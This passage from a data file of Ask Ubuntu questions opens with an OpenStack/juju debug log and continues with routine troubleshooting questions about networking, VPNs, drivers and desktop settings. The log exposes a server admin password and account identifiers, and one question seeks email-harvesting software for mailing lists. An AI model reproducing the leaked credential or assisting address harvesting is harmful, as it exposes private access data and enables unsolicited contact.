: 4 , `` disk '' : 10 , `` name '' : `` m1.large '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/4 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/4 '' , `` rel '' : `` bookmark '' } ] , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 80 , `` ram '' : 8192 , `` id '' : `` 4 '' , `` swap '' : `` '' } , { `` vcpus '' : 1 , `` disk '' : 0 , `` name '' : `` m1.tiny '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` bookmark '' } ] , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 0 , `` ram '' : 512 , `` id '' : `` 1 '' , `` swap '' : `` '' } , { `` vcpus '' : 8 , `` disk '' : 10 , `` name '' : `` m1.xlarge '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/5 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/5 '' , `` rel '' : `` bookmark '' } ] , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 160 , `` ram '' : 16384 , `` id '' : `` 5 '' , `` swap '' : `` '' } , { `` vcpus '' : 1 , `` disk '' : 10 , `` name '' : `` m1.small '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/2 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/2 '' , `` rel '' : `` bookmark '' } ] , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 20 , `` ram '' : 2048 , `` id '' : `` 2 '' , `` swap '' : `` '' } ] } ' 2012-10-12 03:21:21,907 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers 2012-10-12 03:21:21,907 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers' 2012-10-12 03:21:22,284 debug openstack : 202 ' { `` server '' : { `` os-dcf : diskconfig '' : `` manual '' , `` id '' : `` a598b402-8678-4447-baeb-59255409a023 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` bookmark '' } ] , `` adminpass '' : `` sufp48czzdo4 '' } } ' 2012-10-12 03:21:22,284 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/juju_master_id 2012-10-12 03:21:22,285 debug openstack : put 'xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/juju_master_id' 2012-10-12 03:21:22,375 debug openstack : 201 '201 created\n\n\n\n ' 2012-10-12 03:21:27,379 debug waited for 5 seconds for networking on server u'a598b402-8678-4447-baeb-59255409a023' 2012-10-12 03:21:27,380 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 2012-10-12 03:21:27,380 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023' 2012-10-12 03:21:27,556 debug openstack : 200 ' { `` server '' : { `` os-ext-sts : task_state '' : `` networking '' , `` addresses '' : { `` private '' : [ { `` version '' : 4 , `` addr '' : `` 10.0.0.8 '' } ] } , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` bookmark '' } ] , `` image '' : { `` id '' : `` 5bf60467-0136-4471-9818-e13ade75a0a1 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/images/5bf60467-0136-4471-9818-e13ade75a0a1 '' , `` rel '' : `` bookmark '' } ] } , `` os-ext-sts : vm_state '' : `` building '' , `` os-ext-srv-attr : instance_name '' : `` instance-00000060 '' , `` flavor '' : { `` id '' : `` 1 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` bookmark '' } ] } , `` id '' : `` a598b402-8678-4447-baeb-59255409a023 '' , `` user_id '' : `` 01610f73d0fb4922aefff09f2627e50c '' , `` os-dcf : diskconfig '' : `` manual '' , `` accessipv4 '' : `` '' , `` accessipv6 '' : `` '' , `` progress '' : 0 , `` os-ext-sts : power_state '' : 0 , `` config_drive '' : `` '' , `` status '' : `` build '' , `` updated '' : `` 2012-10-12t08:21:23z '' , `` hostid '' : `` 1cdb25708fb8e464d83a69fe4a024dcd5a80baf24a82ec28f9d9f866 '' , `` os-ext-srv-attr : host '' : `` nova01 '' , `` key_name '' : `` '' , `` os-ext-srv-attr : hypervisor_hostname '' : null , `` name '' : `` juju openstack instance 0 '' , `` created '' : `` 2012-10-12t08:21:22z '' , `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` metadata '' : { } } } ' 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 2012-10-12 03:21:27,557 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-floating-ips 2012-10-12 03:21:27,557 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-floating-ips' 2012-10-12 03:21:27,815 debug openstack : 200 ' { `` floating_ips '' : [ { `` instance_id '' : `` a0e0df11-91c0-4801-95b3-62d910d729e9 '' , `` ip '' : `` xxxx.35 '' , `` fixed_ip '' : `` 10.0.0.5 '' , `` id '' : 447 , `` pool '' : `` nova '' } , { `` instance_id '' : `` b84f1a42-7192-415e-8650-ebb1aa56e97f '' , `` ip '' : `` xxxx.36 '' , `` fixed_ip '' : `` 10.0.0.6 '' , `` id '' : 448 , `` pool '' : `` nova '' } , { `` instance_id '' : null , `` ip '' : `` xxxx.37 '' , `` fixed_ip '' : null , `` id '' : 449 , `` pool '' : `` nova '' } , { `` instance_id '' : null , `` ip '' : `` xxxx.38 '' , `` fixed_ip '' : null , `` id '' : 450 , `` pool '' : `` nova '' } , { `` instance_id '' : null , `` ip '' : `` xxxx.39 '' , `` fixed_ip '' : null , `` id '' : 451 , `` pool '' : `` nova '' } , { `` instance_id '' : null , `` ip '' : `` xxxx.40 '' , `` fixed_ip '' : null , `` id '' : 452 , `` pool '' : `` nova '' } , { `` instance_id '' : null , `` ip '' : `` xxxx.41 '' , `` fixed_ip '' : null , `` id '' : 453 , `` pool '' : `` nova '' } ] } ' 2012-10-12 03:21:27,815 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023/action 2012-10-12 03:21:27,816 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023/action' 2012-10-12 03:21:28,356 debug openstack : 202 '' 2012-10-12 03:21:28,356 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state 2012-10-12 03:21:28,357 debug openstack : put 'xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state' 2012-10-12 03:21:28,446 debug openstack : 201 '201 created\n\n\n\n ' 2012-10-12 03:21:28,446 info 'bootstrap ' command finished successfully juju status command root @ cinder01 : /home/cinder # juju -v status 2012-10-12 03:23:28,314 debug initializing juju status runtime 2012-10-12 03:23:28,320 warning verification of xxxxs certificates is disabled for this environment . set 'ssl-hostname-verification ' to ensure secure communication . 2012-10-12 03:23:28,320 debug openstack : using auth-mode 'userpass ' with xxxx : xxxxxx.10:35357/v2.0/ 2012-10-12 03:23:28,320 info connecting to environment ... 2012-10-12 03:23:28,403 debug openstack : authenticated til u'2012-10-13t08:23:20z' 2012-10-12 03:23:28,403 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state 2012-10-12 03:23:28,403 debug openstack : get 'xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state' 2012-10-12 03:23:35,480 debug openstack : 200 'zookeeper-instances : [ a598b402-8678-4447-baeb-59255409a023 ] \n' 2012-10-12 03:23:35,480 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 2012-10-12 03:23:35,480 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023' 2012-10-12 03:23:35,662 debug openstack : 200 ' { `` server '' : { `` os-ext-sts : task_state '' : null , `` addresses '' : { `` private '' : [ { `` version '' : 4 , `` addr '' : `` 10.0.0.8 '' } , { `` version '' : 4 , `` addr '' : `` xxxx.37 '' } ] } , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/servers/a598b402-8678-4447-baeb-59255409a023 '' , `` rel '' : `` bookmark '' } ] , `` image '' : { `` id '' : `` 5bf60467-0136-4471-9818-e13ade75a0a1 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/images/5bf60467-0136-4471-9818-e13ade75a0a1 '' , `` rel '' : `` bookmark '' } ] } , `` os-ext-sts : vm_state '' : `` active '' , `` os-ext-srv-attr : instance_name '' : `` instance-00000060 '' , `` flavor '' : { `` id '' : `` 1 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` bookmark '' } ] } , `` id '' : `` a598b402-8678-4447-baeb-59255409a023 '' , `` user_id '' : `` 01610f73d0fb4922aefff09f2627e50c '' , `` os-dcf : diskconfig '' : `` manual '' , `` accessipv4 '' : `` '' , `` accessipv6 '' : `` '' , `` progress '' : 0 , `` os-ext-sts : power_state '' : 1 , `` config_drive '' : `` '' , `` status '' : `` active '' , `` updated '' : `` 2012-10-12t08:21:40z '' , `` hostid '' : `` 1cdb25708fb8e464d83a69fe4a024dcd5a80baf24a82ec28f9d9f866 '' , `` os-ext-srv-attr : host '' : `` nova01 '' , `` key_name '' : `` '' , `` os-ext-srv-attr : hypervisor_hostname '' : null , `` name '' : `` juju openstack instance 0 '' , `` created '' : `` 2012-10-12t08:21:22z '' , `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` metadata '' : { } } } ' 2012-10-12 03:23:35,663 debug connecting to environment using xxxx.37 ... 2012-10-12 03:23:35,663 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' xxxx.37 '' remote_port= '' 2181 '' local_port= '' 45859 '' . 2012-10-12 03:23:36,173:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-10-12 03:23:36,173:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 662 : client environment : host.name=cinder01 2012-10-12 03:23:36,174:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-10-12 03:23:36,174:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-23-generic 2012-10-12 03:23:36,174:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 2012-10-12 03:23:36,174:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 679 : client environment : user.name=cinder 2012-10-12 03:23:36,174:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/root 2012-10-12 03:23:36,175:4355 ( 0x7fd581973700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/cinder 2012-10-12 03:23:36,175:4355 ( 0x7fd581973700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:45859 sessiontimeout=10000 watcher=0x7fd57f9146b0 sessionid=0 sessionpasswd= < null > context=0x2c1dab0 flags=0 2012-10-12 03:23:36,175:4355 ( 0x7fd577fff700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:45859 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-10-12 03:23:39,512:4355 ( 0x7fd577fff700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:45859 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-10-12 03:23:42,848:4355 ( 0x7fd577fff700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:45859 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client ^croot @ cinder01 : /home/cinder #
199238	export & sync contacts thunderbird ?	how to synchronize address books used in thunderbird ( gmail+eds contact integration and local ) ? necessary export and sync addressbook with ubuntuone contacts . or will only manual editing u1 contacts ? please make the extension `` ubuntuone contacts sync '' for thunderbird .
199239	document management system	is there any document management system in ubuntu ? i tried alfresco , ravendb , owl , document manager . alfresco , ravendb are heavy . more than my requirements . owl having source issues . document manager im trying to install . should keep data on the same machine as i am looking for more of internal purpose . should allow to upload zip files as well . if it extracts zip it will be a great + should allow to send email to preconfigured email addresses should allow to upload data of size around 100mb at one go should maintain history of documents also deleted documents should allow role based document access . should be free : ) it should not do any spoofing on data . documents are confidential . please share your knowledge . thanks .
199243	i want to be able to use the unity menu with citrix full screen	i use citrix reciever at work , with both xenapp and xendesktop . many times at the same time . since the unity menu still appears on the top anyway , i 'd like to be able to use it . now i can see it , but it does n't work . i have to either tab me out , ( double clicking the alt first ) opening another program first , or move the mouse to the left , opening another program from the unity menu from the left , before i can use the menu on the top . ( my menu on the left side is in autohide mode , so i actually like it : ) ) for example . i use spotify for listening to music , it appears on the top menu , but it does n't react when it click it . i have to move the mouse to the left , open another program , then move to the top an ask it to show spotify . if i open spotify from the left menu , it hangs . ( since its hidden , and i have to ask it to be open , not reopen the hole program.. ) or , if i want to lock the screen , i have to open another program , ( i.ex . nixnote ) before i can lock it ) since the unity menu is `` on the top '' anyways , i do n't see the problem that it should be able to control such things .
199244	anyway to install both maas controller and computing node on a single node ?	i wan na build a small private cloud . however , the resources are limited . i do n't want to waste a node just running the controller process . so is there anyway to install a computing node program on the mass controller ?
199245	how can i solve this ? theres a problem with amd configurations	as the title shows up , i tried to installed amdconf but it shows up that command is not found.. how can i solve it then ? can you help me ? sudo amdconfig -- initial -f but it shows `` command not found '' ! ?
199247	bash script ask for root password	i want have a script that i can give to friends which will add repositories and download files , install them without having to use command as they are not command line savey and have no desire to learn . i need to know how to get the script to prompt them for the root password to allow them to do some of these functions . how would i go about this ? please do n't hate on them.. getting them to start using linux was a big step and i am just happy that they are attempting something new ... and it was in the open source world..
199249	recover keyboard mapping ( alt+tab not working anymore )	as i wanted to try ratpoison and other mouseless window manager , i used this .xinitrc there 's a keyboard remapping in there and i 'm afraid ( but not sure it 's this ... ) it messed up my keyboard settings . since , i 've deleted this file , however , my alt+tab shortcut hasnt been working anymore . in the keyboard shortcuts section , the `` switch application '' shortcut is assigned to alt+tab . more over , if i try to reassign this shortcut , and then press alt+tab , the alt+tab shortcut appears and is saved as expected . however , the shortcut does n't produce the wanted behavior . any idea why this happen and how to fix it ?
199252	how to enable global menu for eclipse in 12.10 ?	i would like to know is there a way to enable global menu for eclipse in ubuntu 12.10 ?
199254	802.1q vlan interface configuration on ubuntu 12.04 desktop	what is the correct way of configuring virtual lan interfaces ( hopefully without messing up network manager ) on ubuntu 12.04 desktop ? simply adding the interface to /etc/network/interfaces seems to cause network manager some confusion : auto vlan500 iface vlan500 inet static ... ... vlan_raw_device eth1 is there a better way of doing it ? update : i updated /etc/networkmanager/networkmanager.conf with a no-auto-default clause , and set managed=false in the [ ifupdown ] section : [ main ] plugins=ifupdown , keyfile dns=dnsmasq no-auto-default=6c : fd:12:34:56:78 , [ ifupdown ] managed=false this keeps networkmanager from firing up eth0 , and makes it stay away from eth1 and it 's vlan interfaces . previously it would only let a single vlan interface be up , and it would put the static ip of that vlan interface directly on the eth1 physical interface . still , there is a 2 minute delay during boot as ( i presume ) networkmanager is trying to work out the network configuration . solution : solved by creating keyfiles as described in my answer below . my desktop now boots with all vlan interfaces up and running , and without any delays during boot .
199257	what are the absolutely bare minimum requirements for running local juju ?	i have read the documentation on running local juju with lxc . however , the dependencies in the docs seem kind of extensive for that , eg . why would it need libvirt ( except for maybe the bridge nic ) , what about zookeeper ? what is really minimaly needed to run juju with lxc ?
199258	lenovo ideapad built-in mic not working in 12.04	i just bought a new lenovo p580 ideapad yesterday and installed 12.04 64bit on it . i tried making a call with it and discovered that the built-in microphone was n't working . i unmuted it in sound settings , and still nothing . i did the following : ~ $ cat /proc/asound/card0/codec # * | grep codec codec : conexant cx20590 codec : intel pantherpoint hdmi followed some tips and ran : ~ $ sudo gedit /etc/modprobe.d/alsa-base.conf then added this to the end options snd-hda-intel model=asus i amplified the input sound with alsamixer to make sure ... when the input was amplified to max on alsamixer , the input signal was at a constant level ( 1/3 of max ) which i 'm guessing was the system 's noise . this played back was a low frequency hum . i plugged in headphones that have a built-in mic and that worked , although it still had the humming in the background . i changed the last line in alsa-base.conf to : options snd-hda-intel model=thinkpad which gave me the same result . i 'm not sure where to go from here , and any help would be greatly appreciated ...
199262	dual screen mode on laptop and suspend	i 'm using dual screen mode on a lifebook a531 with external monitor at hdmi . when i close the lid my laptop did n't go to suspend . only both screens are blanking . moving of mouse pointer wakes up an external monitor . but `` suspend '' from desktop menu works normally , system goes to suspend . is there any way to change it ?
199266	web extraction software and spiders with gui	i 'm looking for an email and data extraction programme to build a mailing list for particular industries , i am looking for one with a simple gui but has extensive capabilities and easy to use on ubuntu .
199271	x11 : disable mouse	i use x11 and awesome as my wm . i would like to completely disable the mouse , that is mouse clicks , mouse wheel , mouse movement , display of the cursor , etc . is there an easy way ( i would prefer a disable/enable bash script ) ? thanks !
199272	how do i close fullscreen in cheese	i have a hp 6vt and once i put cheese in full screen it has no way to move back to a window since nothing on my computer works at that point except the off button.i even went to software center and un-installed cheese and then re-installed it and as soon as i open cheese it goes to fullscreen and nothing will close it except restarting the computer . i have tried the f11 button and alt cheese but nothing works once the computer starts cheese .
199273	ralink rt3060 wireless device configuration on ubuntu 12.04	concerning how do i get a ralink rt3060 wireless card working ? i 'm running ubuntu 12.04 with a 'lwpx07 edimax ew-7711in 150m 1t1r wl pci card ' which has a rt3060 chip . out of the box the card is recognized as rt2800sta . i tried solution one , that did n't work . still the card connects to the wireless network , but it seems to slow to load any pages . then i tried solution 2 , but then the network-manager does n't see any wireless device . $ iwconfig lo no wireless extensions . ra0 ralink sta link quality:0 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth0 no wireless extensions . $ lsmod module size used by rt3562sta 882296 0 $ lspci -v 05:02.0 network controller : ralink corp. rt3060 wireless 802.11n 1t/1r subsystem : edimax computer co. device 7711 flags : bus master , slow devsel , latency 64 , irq 23 memory at ff9f0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2860 kernel modules : rt3562sta , rt2800pci am i missing a configuration step ? how do i tell the network card which driver to use ?
199276	is there any method to have the update manager ignore kernel versions older than the one currently installed ?	i am running ubuntu 10.04 and recently installed kernel 2.6.38-generic-pae ( version 2.6.38-15.66~lucid1 ) , which works just fine . there is one small nuisance , however : the update manager continues to ask me to install new 2.6.32 kernel versions . is there any method to have the update manager ignore kernel versions older than the one currently installed ?
199280	how to install `` pc companion '' software of sony xperia ?	i 've successfully installed `` pc companion '' sony xperia in windows . has anyone been able to install pc companion sony xperia in within ubuntu or any other linux distro ?
199281	error while accessing svn repository	we are working on one android project in our company using eclipse as an ide . one person is works on windows platform while i am using ubuntu for android development . we need to connect same project via svn repository . now the problem is we could n't connect our server via ubuntu . i recently started ubuntu for development so i really do n't know much more things about ubuntu . so we failed to connect our project via svn repository . repository is windows based . so how do i configure svn repository in ubuntu ? how to connect server from ubuntu ? ( server is on windows platform ) how to communicate between windows and ubuntu ? while checkout our project it gives some error . i posted error below . please have look on this checkout operation for 'file : //serversystem/application_directory/android ' failed . svn : e180001 : unable to open an ra_local session to url svn : e180001 : unable to open repository 'file : //serversystem/application_directory/android' svn : e170000 : local url 'file : //serversystem/application_directory/android ' contains unsupported hostname i checked all the possibilities like svn : // , file : /// , http : // ; but we failed to access repository thanks and regards tj
199286	create vpn server using the ubuntu vps	i have an ubuntu ( debian ) vps in usa , now want to make up vpn service on it . can you help me to handle it , please . which program surplussed me for . what about socks ! . [ i need it too ] how can i install it . which account manager is better then for accounting .
199287	unable to get updates , how do i resolve the problem ?	i am unable to fetch updates from the updates server . the screenshot above shows the message i got when trying to upgrade : w : failed to fetch http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
199289	how can i access to internet in other programs rather than browsers using a wired connection ?	i have ubuntu 12.04 installed in my compuer . i am using a lan connection to have internet ( it is like those connections when you have to enter a user name and password ) , but if i want to use internet in other place like for making updates or using a different program that needs internet , it is impossible . i do n't know if it is because of the configuration of the lan i am using or is my computer . in fact the only browser i can use is firefox and because i configured something but i do n't remember what , i ca n't use google chrome to access internet with this lan connection . please help me .
199290	can mouse wheel scrolling be enabled in byobu	i 've seen elsewhere that scrolling via the mouse wheel ( and other mousy events ) can be enabled for tmux.. can this feature also be enabled in byobu ( over tmux ) and how ?
199294	how to minimize a window using mouse in pcmanfm ?	how can i minimize a window using mouse in pcmanfm ? i 'm using elementary desktop environment in ubuntu 12.04 update i tried to bring the minimize button back by opening gconf-editor and change the value of /apps/metacity/general/button_layout from close : maximize to close , minimize : maximize . then i logged out and back in , but that change was simply ignored . update again screenshot and the system settings
199302	grub does not display activity during boot	prior to ubuntu 11.04 i could configure grub so that after the menu is displayed and the system is booting detail of the boot activity appears . now there 's just a blank screen between the menu and gdm login . how do i coax ubuntu 11.04 to display the boot activity ? dale e. moore oh yeah ; i asked the same question here http : //ubuntuforums.org/showthread.php ? t=1760753 and they did n't know the answer . this question was asked here https : //answers.launchpad.net/ubuntu/+source/grub2/+question/160511 too , with no new insight .
199303	terminal with tmux style screen splitting ?	moving from os x , loving ubuntu so far . one thing i 'm missing is an iterm 2 like terminal emulator that allows for easy screen splitting . i could use tmux , but would like to be able to copy and paste between terminal windows and applications easily ... which tends to be difficult in tmux . any suggestions ?
199312	what does udevd process do during the boot time ?	ubuntu 11.04 boot time is 80 seconds 67 of which belong to the udevd process . here 's what dmesg shows : [ 6.534288 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 73.216006 ] udevd [ 399 ] : starting version 175 what udevd does and is it possible to reduce the time of its work ?
199316	ip forwarding not working in ubuntu 12.04 server	i 'm having trouble getting ip forwarding going in ubuntu 12.04 server with ufw . i 'm trying to get openvpn working . i have two interfaces , eth0 and tun0 , and they ca n't ping each other . i 've made the interfaces promiscuous . net/ipv4/ip_forward=1 in /etc/ufw/sysctl.conf . default_forward_policy= '' accept '' in /etc/default/ufw . i used the ip masquerading section from is there something i am missing ? network setup is as such : [ gateway ] < lan - 172.28.0.0/16 > [ ubuntu ] < vpn network - 172.29.0.0/22 > [ vpn clients ]
199319	what is the difference between clamav and clamtk ?	what is the difference between clamav and clamtk ? i know that both of them are antivirus .
199326	user name on top-right most tray vanished !	user name on top-right most tray vanished ! i ca n't see it any more . i see the power button and directly beside it is the clock , i 'm using ubuntu the latest version until now ( v.12 ) 32-bit any solutions to get it back showing ? ?
199327	how is one supposed to stop chromium processes ?	after i close the chromium gui many chromium-browser processes continue running indefinitely . it seems like it 's running a daemon that keeps processes around so they can be reused . checking the manual and help pages for the chromium-browser command only lists a small number of 'stable ' options , none of which seem to have anything to do with ending child processes . if i kill them i get a load of notice dialogues in the bottom-right of the screen complaining that various extensions have `` crashed '' . is there a proper , less-aggressive way to terminate chromium processes ?
199329	12.10 : login screen never goes blank	i have installed the 12.10 beta ( with all updates ) on my imac early 2008 . one annoying problem i 'm having is that , when i log out of my account and go back to the login screen ( lightdm , per default ) , the screen stays on : it never goes blank . this is not good for my display i guess ! the screensaver ( set to just a blank screen ) works just fine when i 'm logged in . the problem only appears at the login screen . any ideas ?
199333	when a media file is selected , and i press space , a media player comes up - which application is responsible for that ?	as is said in the title : when a media file is selected , in nautilus or just on the desktop , and i press space , a media player comes up - which application is responsible for that ? for example on audio , it displays a record icon along with basic artist info . it 's not coming from eog , not from the default audio player , etc . i am using ubuntu 12.04 with gnome 3.x . is it a gnome integrated player , on the newer 3.x series of gnome ? ? on another machine , it simply fires the default player , mplayer or gnome on audio or video respectively ... .
199339	how can i modify the knetworkmanager icon in my kde taskbar ?	i am using kubuntu 12.04 precise 64 on my notebook . almost everything works fine . i would like to modify the colors of the icon ( s ) used by knetworkmanager to indicate wifi online . right now , i am using the ( default ? ) oxygen theme . what i want is to make the online icons some color other than gray - probably black , so the contrast is greater and they 're easier for me to see ( i use reading glasses . ) i found an old article on how to do this , but when i added the icons it mentioned , they were ignored . where are these icons stored ? can i just edit them with something like gimp to change the colors , etc. ? tia
199342	abiword can not open .awb file	abiword can not open .abw file . the error message received is : it appears to be an invalid document . please let me know how to confirm if the abiword program is installed ?
199343	can i use elementary 's workspace switcher in ubuntu ?	is there a workspace switcher for compiz like elementary 's ? it 's faster and nicer than ubuntu 's current one . alternatively , is it possible to use elementary 's window manager instead of compiz ?
199345	ca n't find openjdk 's jre ? no java plugin in chrome web browser	i have recently installed openjdk just to try out writing some java application $ dpkg -l | grep jdk ii openjdk-7-jdk 7u7-2.3.2a-0ubuntu0.12.04.1 openjdk development kit ( jdk ) ii openjdk-7-jre 7u7-2.3.2a-0ubuntu0.12.04.1 openjdk java runtime , using hotspot jit ii openjdk-7-jre-headless 7u7-2.3.2a-0ubuntu0.12.04.1 openjdk java runtime , using hotspot jit ( headless ) ii openjdk-7-jre-lib 7u7-2.3.2a-0ubuntu0.12.04.1 openjdk java runtime ( architecture independent libraries ) that 's what i have on my system . although i have all this installed when in chrome i go to a website which needs jre it ca n't find it . how can i fix it ?
199352	how to install skype version 4 in kubuntu 12.04 ?	i 've tried to install skype in my kubuntu version 12.04 , but it will not even start to install . i took of course the .deb version ( to be precise the file : ' skype-ubuntu_4.0.0.8-1_i386.deb ' ) , made that file executable and double-clicked on it . ... .. no reaction ! ... what to do now ? with the steps mentioned above i succeeded skype to get installed and working in ubuntu 12.04 .
199353	ca n't install ubuntu 12.04 64-bit on a dual-drive macbook pro 8,2	good afternoon , this is the first time i participate here as i 'm new to linux . i 've been trying to solve the following problem for over a week without any sign of success so i hope there 's a much more knowledgeable person here that can give me a solution . i have an early 2011 macbook pro ( 8,2 ) with mac os x running in a ssd . then , instead of the optical bay , i have a hdd in where i would like to install ubuntu to run it natively . i 've tried to do the normal installation process , with or without refit , but it seems the problem resides on the communication between the device containing the ubuntu .iso file and the laptop . it does n't allow communication with the boot cd or usb drive . it usually says : “loading bootlogo ... ” after i click on the “boot from cd , linux icon” . after trying several things , i would like to know if i could install ubuntu on the hdd as an external hdd ( using a friend 's window 's system ) and then simply put it back into my laptop so as to become an internal hdd again . i guess , i would have to reinstall many drivers and so on , but would this approach work ? thanks in advance and sorry for this huge block of text
199355	how can i make rsync to switch to another harddrive automatically if space on the first one is full ?	my problem is , how can i make rsync to switch to another harddrive automatically if space on the first one is full ? is there a simple way ? or even a way without using rsync ?
199361	how can i fix white characters on menus and the launcher not disappearing ?	on 12.04 lts , i was trying to install some packages for dependencies of the allegro game development library . one of the packages was libwxgtk2.8-0 . after installing , a red cross appeared near my user name and clock . then the computer froze , so i removed the battery . when i restarted my computer , it started booting but got stuck at a black screen with the line `` checking battery state '' i solved that problem by running : sudo apt-get -- reinstall install gnome-power-manager however , now the launcher fails to ever disappear . moreover , the characters in most applications have turned white : what could be the problem , and what can i do to fix it ?
